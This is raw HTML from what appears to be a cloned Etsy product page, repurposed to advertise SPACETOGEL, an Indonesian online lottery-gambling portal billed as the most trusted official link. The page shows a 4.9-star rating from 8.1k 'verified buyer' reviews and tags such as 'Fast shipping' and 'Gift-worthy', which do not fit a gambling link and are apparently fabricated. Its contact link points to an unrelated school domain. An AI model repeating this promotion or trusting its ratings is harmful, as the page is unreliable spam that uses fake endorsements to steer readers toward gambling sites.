    <div><span class="wt-icon wt-nudge-b-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="6" cy="17" r="1"/><path d="M21.707 10.293L20.414 9l1.293-1.293c.39-.39.39-1.023 0-1.414l-1-1C20.52 5.105 20.267 5 20 5H10c0-2.206-1.794-4-4-4S2 2.794 2 5v12c0 2.206 1.794 4 4 4h14c.266 0 .52-.105.707-.293l1-1c.39-.39.39-1.023 0-1.414L20.414 17l1.293-1.293c.39-.39.39-1.023 0-1.414L20.414 13l1.293-1.293c.39-.39.39-1.023 0-1.414zM6 19c-1.103 0-2-.897-2-2s.897-2 2-2 2 .897 2 2-.897 2-2 2zm2-5.444C7.41 13.212 6.732 13 6 13s-1.41.212-2 .556V5c0-1.103.897-2 2-2s2 .897 2 2v8.556zm10.293-3.85L19.586 11l-1.293 1.293c-.39.39-.39 1.023 0 1.414L19.586 15l-1.293 1.293c-.39.39-.39 1.023 0 1.414L19.586 19H9.444c.344-.59.556-1.268.556-2V7h9.586l-1.293 1.293c-.39.39-.39 1.023 0 1.414z"/></svg></span></div>
        <div class="wt-ml-xs-1 wt-display-flex-xs wt-flex-wrap">
    <p class="wt-mr-xs-1">Gift wrapping available</p>
    <span class="wt-popover" data-wt-popover>
        <a tabindex="0" data-wt-popover-trigger data-gift-wrap-trigger class="wt-popover__trigger wt-popover__trigger--underline wt-display-inline-flex-xs wt-align-items-center" aria-describedby="item-highlights-gift-wrap-popover" aria-disabled="true">
            <span class="wt-text-caption">See details</span>
        </a>
        <span id="item-highlights-gift-wrap-popover" role="tooltip" class='giftwrap-popover wt-display-none'>
        <img
    data-clg-id="WtImage"
    class="wt-flex-xs-2 wt-rounded wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt=""
    style="max-height: 150px; max-width: 150px; aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 639px) 150px, 300px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>
</span>
    </span>
</div>
</li>
    </ul>
</div>
<div class="wt-mt-xs-2">
        <h1 style="font-size: 20px;">SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia</h1><br>

</div>

<div data-id="description-text">
    <div
        id="content-toggle-product-details-read-more"
        class="wt-content-toggle__body wt-content-toggle__body--truncated wt-content-toggle__body--truncated-02"
    >
        <p data-product-details-description-text-content class="wt-text-body-01 wt-break-word" style="text-align: justify
        ;">
            Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional.
        </p>
        
    </div>
    </div>
</div>

            </div>
        </div>
    </div>
<div data-appears-component-name="did_you_know">
<div id="did_you_know">
    <div class="wt-content-toggle " data-selector="info-section-content-toggle">

<style>
/* === Animasi untuk #e0NMFoeIPOT2 === */
.is-in-view #e0NMFoeIPOT2_to {
  animation: e0NMFoeIPOT2_to__to 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT2_to__to {
  0% { transform: translate(44.162561px, 5.846695px); }
  8% { transform: translate(44.162561px, 5.846695px); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: translate(42.257336px, 6.69656px); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: translate(46.27px, 7.700005px); }
  36.5% { transform: translate(42.752561px, 5.5px); }
  48% { transform: translate(44.150002px, 6.297191px); }
  100% { transform: translate(44.150002px, 6.297191px); }
}

.is-in-view #e0NMFoeIPOT2_tr {
  animation: e0NMFoeIPOT2_tr__tr 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT2_tr__tr {
  0% { transform: rotate(-5deg); }
  8% { transform: rotate(-5deg); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: rotate(-7deg); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: rotate(7deg); }
  36.5% { transform: rotate(-5deg); }
  48% { transform: rotate(0deg); }
  100% { transform: rotate(0deg); }
}

/* === Animasi untuk #e0NMFoeIPOT5 === */
.is-in-view #e0NMFoeIPOT5_to {
  animation: e0NMFoeIPOT5_to__to 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT5_to__to {
  0% { transform: translate(4.2px, 5.697011px); }
  8% { transform: translate(4.2px, 5.697011px); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: translate(5.826704px, 6.546839px); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: translate(1.52px, 7.701463px); }
  36.5% { transform: translate(5.294274px, 5.6px); }
  48% { transform: translate(3.85px, 6.297191px); }
  100% { transform: translate(3.85px, 6.297191px); }
}

.is-in-view #e0NMFoeIPOT5_tr {
  animation: e0NMFoeIPOT5_tr__tr 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT5_tr__tr {
  0% { transform: rotate(5deg); }
  8% { transform: rotate(5deg); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: rotate(7deg); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: rotate(-7deg); }
  36.5% { transform: rotate(5deg); }
  48% { transform: rotate(0deg); }
  100% { transform: rotate(0deg); }
}

/* === Animasi untuk #e0NMFoeIPOT8 === */
.is-in-view #e0NMFoeIPOT8_to {
  animation: e0NMFoeIPOT8_to__to 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT8_to__to {
  0% { transform: translate(28.52px, 15.1px); }
  8% { transform: translate(28.52px, 15.1px); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: translate(26.96px, 16.52px); animation-timing-function: cubic-bezier(0.284467, 0, 0.625227, 0.383992); }
  18.5% { transform: translate(27.14px, 16.214055px); animation-timing-function: cubic-bezier(0.310382, 0.25506, 0.719913, 0.848254); }
  19.5% { transform: translate(27.3px, 15.96px); }
  20.5% { transform: translate(27.47px, 15.63px); }
  22.5% { transform: translate(27.96px, 14.98px); }
  24.5% { transform: translate(28.46px, 14.3px); }
  27% { transform: translate(29.004407px, 13.613261px); animation-timing-function: cubic-bezier(0.36087, 0.641427, 0.696459, 1); }
  28% { transform: translate(29.07px, 13.52px); }
  28.5% { transform: translate(28.952353px, 13.590588px); }
  30% { transform: translate(28.55px, 13.84px); }
  31% { transform: translate(28.3px, 14px); }
  32% { transform: translate(28.13px, 14.18px); }
  33% { transform: translate(27.85px, 14.3px); }
  33.5% { transform: translate(27.776555px, 14.35px); }
  34% { transform: translate(27.6px, 14.4px); }
  34.5% { transform: translate(27.540925px, 14.5px); }
  35.5% { transform: translate(27.305294px, 14.6px); }
  36.5% { transform: translate(27.07px, 14.72px); }
  48% { transform: translate(27.765359px, 14.148534px); }
  100% { transform: translate(27.765359px, 14.148534px); }
}

.is-in-view #e0NMFoeIPOT8_tr {
  animation: e0NMFoeIPOT8_tr__tr 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT8_tr__tr {
  0% { transform: rotate(-5deg); }
  8% { transform: rotate(-5deg); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: rotate(-7deg); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: rotate(7deg); }
  36.5% { transform: rotate(-5deg); }
  48% { transform: rotate(0deg); }
  100% { transform: rotate(0deg); }
}
</style>

    <g id="e0NMFoeIPOT2_to" transform="translate(44.162561,5.846695)">
        <g id="e0NMFoeIPOT2_tr" transform="rotate(-5)">
            <g transform="translate(-44.150002,-6.29719)">
                <path d="M34.7,33.1l4.4-4.4c4.8-4.8,4.8-12.6,0-17.4v0c-4-4-10.1-4.9-14.7-2.1L17.7,15l17,18.1Z" fill="#4d6bc6"/>
                <path d="M36.5,33.5l-2.2-2.2l3.6-3.6c4.2-4.2,4.2-11,0-15.2C34.4,9,29,8.4,25.1,10.8L23.5,8.2C28.6,5,35.6,5.8,40.1,10.3c5.4,5.4,5.4,14.2,0,19.6l-3.6,3.6Z" fill="#222"/>
            </g>
        </g>
    </g>
    <g id="e0NMFoeIPOT5_to" transform="translate(4.2,5.697011)">
        <g id="e0NMFoeIPOT5_tr" transform="rotate(5)">
            <g transform="translate(-3.85,-6.297191)">
                <path d="M40.5,25.2l-4.8-4.8v0l-9-9c-4.8-4.8-12.6-4.8-17.4,0s-4.9,12.6-.1,17.4L15.4,35v0l4.4,4.4c1.2,1.2,3.2,1.2,4.4,0s1.2-3.2,0-4.4l-1.7-1.7l3.9,3.9c1.2,1.2,3.2,1.2,4.4,0s1.2-3.2,0-4.4l1.1,1.1c1.2,1.2,3.2,1.2,4.4,0v0c1.2-1.2,1.2-3.2,0-4.4l-4.9-4.9v0l4.9,4.9c1.2,1.2,3.2,1.2,4.4,0c1-1.2,1-3.1-.2-4.3Z" fill="#d7e6f5"/>
                <path d="M42.7,27.4c0-1.2-.5-2.4-1.4-3.3l-4.8-4.8v0l-9-9c-5.4-5.4-14.2-5.4-19.6,0s-5.4,14.2,0,19.6l6.2,6.2v0l4.4,4.4c.9.9,2.1,1.3,3.3,1.3s2.4-.4,3.3-1.3c.4-.4.7-.9,1-1.5.7.4,1.5.6,2.3.6c1.2,0,2.4-.4,3.3-1.3.6-.6,1-1.3,1.2-2c.3.1.7.1,1,.1c1.2,0,2.4-.5,3.3-1.4.8-.8,1.3-1.9,1.3-3c1.1-.1,2.2-.5,3-1.3.7-.9,1.2-2.1,1.2-3.3Zm-3.6,1.1c-.6.6-1.6.6-2.2,0l-7.6-7.6L27.2,23l7.6,7.6c.6.6.6,1.6,0,2.2s-1.6.6-2.2,0l-1.1-1.1L25,25.2l-2.2,2.2l6.5,6.5c.6.6.6,1.6,0,2.2s-1.6.6-2.2,0L25,33.9l-4.4-4.4-2.2,2.2l4.4,4.4c.6.6.6,1.6,0,2.2s-1.6.6-2.2,0l-1.9-1.9v0L10,27.7c-4.2-4.2-4.2-11,0-15.2s11-4.2,15.2,0l6.2,6.2v0L39,26.3c.3.3.5.7.5,1.1.1.4-.1.8-.4,1.1Z" fill="#222"/>
            </g>
        </g>
    </g>
    <g id="e0NMFoeIPOT8_to" transform="translate(28.52,15.1)">
        <g id="e0NMFoeIPOT8_tr" transform="rotate(-5)">
            <g transform="translate(-27.765359,-14.148534)">
                <path d="M32.3,15.1L23,19.8c-1.7,1.2-4.2.8-5.4-.9v0c-1.2-1.7-.8-4.1.9-5.4c2.1-1.5,4.7-3.4,5.6-3.9C28.7,6.7,35,7.4,39,11.4v0" fill="#4d6bc6"/>
                <path d="M19.4,14.7l1.9-1.4c1-.7,2-1.4,2.7-1.9.4-.3.7-.5.9-.6.7-.4,1.4-.7,2.1-.9c3.7-1.2,8-.3,10.9,2.6l2.2-2.2c-4.2-4.2-10.9-5.2-16-2.5-.3.1-.5.3-.8.4-.4.3-1.3.9-2.3,1.6-.5.3-.9.7-1.4,1l-1.9,1.4c-2.4,1.7-3,5.1-1.3,7.5.8,1.2,2.1,2,3.5,2.2.3.1.6.1.9.1c1.1,0,2.2-.3,3.1-1l5.9-4.1l2.6-1.8-2.2-2.2-2.6,1.8-5.4,3.8c-.5.4-1.1.5-1.7.4s-1.1-.4-1.5-1c-.9-1-.6-2.5.4-3.2Z" fill="#222"/>
            </g>
        </g>
    </g>
</svg></span>
        </div>
    </div>    
</div>
</div>

 </div>


            <div class=" wt-mt-xs-1" data-region="seller-details-captcha">
                <div class="g-recaptcha-etsy"
     data-sitekey="6LdLaJ4dAAAAAJ7wEqcouvMBPRU1ssOPOcYYzPJQ"
     data-etsy-autoload="false"
     data-recaptcha-version="enterprise"
     data-recaptcha-key-type="checkbox"
     id="g-recaptcha-etsy-shop_seller_details-checkbox"
     data-badge="inline"
     data-recaptcha-action="shop_seller_details"
>
</div>
<div class="wt-alert wt-alert--inline wt-alert--error-01 wt-display-none js-recaptcha-load-error">
       <p class="wt-text-body-01">Captcha failed to load. Try using a different browser or disabling ad blockers.</p>
</div>
<input id="g-recaptcha-etsy-shop_seller_details-checkbox-input"
       type="hidden"
       name="enterprise_recaptcha_token"
       value=""
/>
<input id="g-recaptcha-etsy-shop_seller_details-checkbox-input-key-type"
       type="hidden"
       name="enterprise_recaptcha_token_key_type"
       value="checkbox"
/>
            </div>

<div data-clg-id="WtOverlay" class="wt-overlay wt-overlay--info wt-overlay--has-close-icon" id="reg-seller-details-overlay" aria-hidden="true" aria-modal="false" role="dialog" aria-label="This is an overlay with regulatory seller details" data-wt-overlay>
    <div class="wt-overlay__modal" data-overlay-modal>
            <button type="button" class="wt-btn wt-btn--transparent wt-btn--icon wt-overlay__close-icon wt-btn--light"  aria-label="Close" data-wt-overlay-close>
                <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M13.414,12l6.293-6.293a1,1,0,0,0-1.414-1.414L12,10.586,5.707,4.293A1,1,0,0,0,4.293,5.707L10.586,12,4.293,18.293a1,1,0,1,0,1.414,1.414L12,13.414l6.293,6.293a1,1,0,0,0,1.414-1.414Z"/></svg></span>
            </button>
                    <div class="wt-overflow-y-auto" id="seller-details--inner-container">
<div data-clg-id="WtOverlayHeader" class="wt-overlay__header" >
                        <h2 class="wt-text-heading">Seller details </h2>

</div>
                    <p class="wt-mb-xs-2" id="seller-details-trader-info">
                    </p>


                    <div class="wt-mb-xs-4">
                        <h3 class="wt-text-title-large">
                            Business registration number
                        </h3>
                        <p id="seller-details-reg-number" class="wt-mb-xs-2 wt-mt-xs-2">
                        </p>
                    </div>

                    <div class="wt-mb-xs-4">
                            <h3 class="wt-text-title-large">
                                Location
                            </h3>
                            <p id="seller-details-addresss" class="wt-mb-xs-2 wt-mt-xs-2">
                            </p>
                    </div>


                <div class="wt-mb-xs-2">
                    <p class="wt-mb-xs-2 wt-mt-xs-2">
                        Need to get in touch with the seller? Try <a
    rel="nofollow"
    href="https://ppschool.org.in/stella/messages/new?with_id=386926495&referring_id=25947065&referring_type=shop&recipient_id=386926495&from_action=contact-seller"
    
    class="wt-display-inline-block contact-action convo-overlay-trigger inline-overlay-trigger"
    role="button"
    data-to_username="SPACETOGEL"
    data-to_user_id="386926495"
    data-to_user_display_name="SPACETOGEL"
        data-referring_type="shop"
        data-referring_id="25947065"
    
    data-subject=""
    data-message=""
    
    aria-label="messaging them"
>
    
    
    <span>messaging them</span> 
    
    
</a>  on SPACETOGEL first.
                    </p>
                </div>
            </div>

    </div>
  </div>
</div>


                    <div class="listing-info wider-review-col wt-order-xs-6">
    <div
        class="wt-flex-lg-5 wt-align-items-flex-start wt-max-width-full wt-pl-md-4 wt-pr-md-4 wt-pr-lg-0 wt-pl-lg-5 wt-pl-xs-2 wt-pr-xs-2"
        data-appears-component-name="listing_page_reviews_container_top"
        data-offset="0.01"
    >
        <div class="wt-mb-xs-3">
            <div data-lazy-loaded-bottom-section-before-reviews-trigger></div>
            <div data-appears-component-name="listing_page_reviews">
<div data-reviews-container id="reviews"
     class="wt-align-items-flex-start wt-mb-xs-6 wt-mb-lg-9">
    <div data-appears-component-name="reviews_header">
<div class="wt-display-flex-xs wt-align-items-center wt-flex-wrap wt-mb-xs-2 wt-mt-xs-2 wt-mt-md-0 wt-justify-content-space-between wt-flex-gap-xs-2">
  <div>
    <div class="wt-display-flex-xs wt-align-items-center">
      <span class="wt-icon wt-fill-beeswax wt-nudge-b-1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
      <p class="wt-text-title-large wt-nudge-l-2">4.9 out of 5</p>
      <p class="wt-text-body-large wt-ml-xs-2 wt-text-gray">(8.1k reviews)</p>
    </div>
    <p class="wt-text-body-small wt-sem-text-secondary">All reviews are from verified buyers</p>
  </div>
  <div class="wt-display-flex-xs wt-align-items-center wt-flex-gap-sm-2 wt-flex-gap-xs-3 wt-justify-content-space-between wt-flex-grow-xs-1 wt-flex-grow-md-0">
      <div class="wt-display-flex-xs wt-align-items-center wt-flex-xs-1">
        <span class="rating-score fill-5 wt-flex-shrink-xs-0">
          <span class="rating-value wt-text-title-small">
            5/5
          </span>
        </span>
        <span class="rating-label wt-text-body-smaller">Item quality</span>
      </div>
      <div class="wt-display-flex-xs wt-align-items-center wt-flex-xs-1">
        <span class="rating-score fill-5 wt-flex-shrink-xs-0">
          <span class="rating-value wt-text-title-small">
            5/5
          </span>
        </span>
        <span class="rating-label wt-text-body-smaller">Shipping</span>
      </div>
      <div class="wt-display-flex-xs wt-align-items-center wt-flex-xs-1">
        <span class="rating-score fill-5 wt-flex-shrink-xs-0">
          <span class="rating-value wt-text-title-small">
            5/5
          </span>
        </span>
        <span class="rating-label wt-text-body-smaller">Customer service</span>
      </div>
  </div>
</div>
</div>

    
    <div data-clg-id="WtSpinner" class="wt-spinner wt-spinner--02 wt-display-none" aria-live="assertive" data-reviews-pagination-loading-spinner="">
        <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 48 48" aria-hidden="true" focusable="false"><circle fill="transparent" cx="24" cy="24" r="21"/></svg></span>
        Loading
    </div>


    <div data-reviews>
        <div class="wt-mb-xs-3">
                <div class="wt-mt-xs-3 wt-mt-md-4 wt-mb-xs-3 wt-mb-md-2">
                    <div data-appears-component-name="reviews_feature_tags" data-appears-event-data='{"num_tags":18}'>
<div
    data-reviews-feature-tags
    data-listing-id="4302118744"
    class="wt-b-xs wt-b-md-none wt-rounded-02 wt-p-xs-2 wt-p-md-0 wt-display-flex-xs wt-flex-wrap wt-flex-gap-xs-2"
>
    <span class="wt-display-flex-xs wt-align-items-center wt-flex-gap-xs-1 wt-width-full-xs wt-width-auto-md">
        <span class="etsy-icon wt-icon--smaller-xs wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="m15.4 14.1-3.7-1.9-1.8-3.6c-.3-.7-1.4-.7-1.8 0l-1.9 3.7-3.7 1.9c-.3.1-.5.4-.5.8q0 .6.6.9l3.7 1.9 1.9 3.7c.1.3.4.5.8.5q.6 0 .9-.6l1.9-3.7 3.7-1.9c.3-.2.6-.5.6-.9s-.3-.6-.7-.8m6-8L19 4.9l-1.2-2.4c-.3-.7-1.4-.7-1.8 0l-1.2 2.4-2.4 1.2c-.2.2-.4.5-.4.9q0 .6.6.9L15 9.1l1.2 2.4c.2.3.5.6.9.6q.6 0 .9-.6l1.2-2.4 2.4-1.2c.2-.2.4-.5.4-.9q0-.6-.6-.9"/></svg></span>
        <span class="wt-text-title-small">Buyer highlights, summarized by Grey</span>
    </span>
    <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-flex-wrap">
            <span data-tag="Great quality" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Great quality
            </span>
            <span data-tag="Lovely" data-tag-type="Expressive" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Lovely
            </span>
            <span data-tag="Fast shipping" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Fast shipping
            </span>
            <span data-tag="Gift-worthy" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Gift-worthy
            </span>
            <span data-tag="Beautiful" data-tag-type="Expressive" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Beautiful
            </span>
            <span data-tag="As described" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                As described
            </span>
            <span data-tag="Cute" data-tag-type="Expressive" class="wt-text-body-small--tight wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Cute
            </span>
    </div>
</div>
</div>
                </div>



                <div class="wt-display-flex-xs wt-justify-content-space-between wt-mt-md-1">
                    <div class="wt-max-width-full">
                        <div data-appears-component-name="reviews_categorical_tags" data-appears-event-data='{"num_tags":10}'>
<div data-reviews-categorical-tags data-listing-id="4302118744" class="wt-position-relative tag-scroller">
    <div data-reviews-categorical-tags-container class="categorical_tags wt-pl-xs-1 wt-pt-xs-2 wt-pb-xs-2 wt-pt-md-3 wt-pb-md-3 wt-pr-xs-2 wt-mr-xs-1 wt-z-index-1 wt-overflow-x-auto">
<div data-clg-id="WtChipGroup" class="wt-chip-group wt-display-flex-xs wt-flex-nowrap" role="group" aria-labelledby="571a23e0-13e0-424c-af45-27deb0783e04">
  <span class="wt-screen-reader-only" id="571a23e0-13e0-424c-af45-27deb0783e04">Filter by category</span>
  <div class="wt-chip-group__container wt-display-flex-xs wt-flex-nowrap">
    <button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Quality" data-tag-type="Categorical"
  aria-label="Quality"
  aria-pressed="false"
  
  >
    
                      Quality (90)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Shipping &amp; Packaging" data-tag-type="Categorical"
  aria-label="Shipping & Packaging"
  aria-pressed="false"
  
  >
    
                      Shipping & Packaging (60)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Appearance" data-tag-type="Categorical"
  aria-label="Appearance"
  aria-pressed="false"
  
  >
    
                      Appearance (50)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Description accuracy" data-tag-type="Categorical"
  aria-label="Description accuracy"
  aria-pressed="false"
  
  >
    
                      Description accuracy (48)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Seller service" data-tag-type="Categorical"
  aria-label="Seller service"
  aria-pressed="false"
  
  >
    
                      Seller service (19)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Sizing &amp; Fit" data-tag-type="Categorical"
  aria-label="Sizing & Fit"
  aria-pressed="false"
  
  >
    
                      Sizing & Fit (10)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Value" data-tag-type="Categorical"
  aria-label="Value"
  aria-pressed="false"
  
  >
    
                      Value (9)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Comfort" data-tag-type="Categorical"
  aria-label="Comfort"
  aria-pressed="false"
  
  >
    
                      Comfort (8)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Ease of use" data-tag-type="Categorical"
  aria-label="Ease of use"
  aria-pressed="false"
  
  >
    
                      Ease of use (2)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Condition" data-tag-type="Categorical"
  aria-label="Condition"
  aria-pressed="false"
  
  >
    
                      Condition (1)

</button>

  </div>
</div>    </div>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-btn--icon wt-btn--small cat_tags_prev wt-position-absolute wt-position-left wt-z-index-2 wt-p-xs-0 wt-hide-xs" aria-label="Scroll previous" data-reviews-categorical-tags-previous="">
                <span class="wt-icon wt-icon--smaller-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M16 21.002a1 1 0 0 1-.664-.253L5.5 12.002l9.841-8.748a1 1 0 0 1 1.328 1.494L8.5 12.002l8.159 7.252A1 1 0 0 1 16 21.002"/></svg></span>

</button>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-btn--icon wt-btn--small cat_tags_next wt-position-absolute wt-position-right wt-z-index-2 wt-p-xs-0" aria-label="Scroll next" data-reviews-categorical-tags-next="">
                <span class="wt-icon wt-icon--smaller-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M8 21a1 1 0 0 1-.664-1.747l8.164-7.254-8.164-7.252a1 1 0 0 1 1.328-1.494L18.5 12l-9.836 8.747A1 1 0 0 1 8 21"/></svg></span>

</button>
</div>
</div>
                    </div>
                    <div class="wt-flex-shrink-xs-0 wt-display-flex-xs wt-justify-content-flex-end wt-align-items-center">
                        <div class="wt-display-flex-xs wt-justify-content-flex-end"
>
    <div data-clg-id="WtMenu" class="wt-menu " data-wt-menu id="sort-reviews-menu" data-hide-trigger-on-open="false" data-animate-in="true" data-close-on-select="true" data-contain-focus="false" data-open-direction-vert="bottom" data-open-direction-horiz="left" data-open-direction-force="false" data-menu-type="option">
            <button data-clg-id="WtMenuTrigger" type="button" class="wt-menu__trigger wt-btn wt-btn--transparent wt-btn--small sort-reviews-trigger" aria-haspopup="true" aria-expanded="false" data-wt-menu-trigger >
        <span class="wt-menu__trigger__label">Suggested</span>
        <span class="wt-icon wt-menu__trigger__caret"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><polygon points="16.5 10 12 16 7.5 10 16.5 10"/></svg></span>
</button>
<div data-clg-id="WtMenuBody" role="menu" class="wt-menu__body " data-wt-menu-body >
                <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item wt-is-selected reviews-sort-by-item" tabindex="-1" data-sort-option="Relevancy" aria-checked="true">
     Suggested 
</button>

            <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item reviews-sort-by-item" tabindex="-1" data-sort-option="Recency" aria-checked="false">
     Most recent 
</button>

            <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item reviews-sort-by-item" tabindex="-1" data-sort-option="Highest" aria-checked="false">
     Highest Rating 
</button>

            <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item reviews-sort-by-item" tabindex="-1" data-sort-option="Lowest" aria-checked="false">
     Lowest Rating 
</button>


</div>
</div>
</div>
                    </div>
                </div>

        </div>

        

        <div class="wt-grid wt-grid--block wt-mb-xs-2 wt-mb-lg-6">
            <div class="wt-grid__item-xs-12 review-card" data-review-region="4677086143">
    <div class="wt-bb-xs wt-pt-xs-2 wt-pt-md-1 wt-pb-xs-2">
        <div class="min-width-0" id="review-text-width-0">
            <div class="wt-max-width-full">
                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-flex-wrap wt-mb-xs-2 wt-mb-md-0">
                    <div class="wt-mb-xs-1">
                        <span class="wt-display-inline-block wt-mr-xs-1" data-stars-svg-container>
    <input type="hidden" name="initial-rating" value="5" />
    <input type="hidden" name="rating" value="5" />
    <span class="wt-screen-reader-only">5 out of 5 stars</span>

    <span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
